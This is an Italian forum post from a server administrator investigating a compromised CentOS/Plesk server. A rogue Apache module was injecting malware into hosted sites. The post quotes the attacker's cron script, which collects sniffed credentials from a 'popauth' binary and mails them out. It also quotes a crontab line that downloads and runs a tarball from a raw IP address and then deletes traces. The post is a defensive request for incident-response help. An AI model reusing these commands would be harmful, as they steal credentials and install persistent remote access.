Attualmente sto cercando di scoprire come uno dei nostri centos server è stato compromesso. Abbiamo riscontrato malware sui nostri siti. Dopo la ricerca ho finalmente trovato il malware iniettare nei siti. Come stava accadendo a caso, era difficile da rilevare. Ho seguito l'aiuto di questo articolo del blog:
Questo mi ha portato a cercare tra tutti i moduli Apache e alla fine ho trovato un modulo che stava iniettando il malware. Andava sotto il nome di mod_string_mime.so e veniva caricato tramite /etc/httpd/conf.d/mailman.conf per evitare il rilevamento. Molto frustrante. Quindi, il modulo è stato cancellato e il file mailman.conf è tornato alla normalità.
Scavando ulteriormente, ho installato ed eseguito rkhunter. Dopo aver eseguito ciò, ho trovato un avviso per un file sospetto in /etc/cron.daily/ chiamato dnsquery. In questo file, questo è quello che sembra ...
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail [email protected] -s "$(hostname -f)" < test
mail [email protected] -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
Ho provato a eliminare questo file ma continua a tornare ogni minuto. Il proprietario e il gruppo sono "psaadm". Non riesco a trovare come viene creato. Presumo che stia generando attraverso plesk cron o qualcosa del genere.
L'ho trovato anche in crontab:
* * * * * chattr -AacDdijsSu /bin/; cd /root ; wget http://77.241.87.75/xpsa/skdet.tgz; chmod +x skdet.tgz; tar zxvf skdet.tgz ; cd skdet ; ./inst; rm -rf /usr/share/misc /root/sk* /tmp/nc* /root/ssh/;
che non sembra giusto.
Qualche suggerimento su come procedere o individuare l'intrusione?
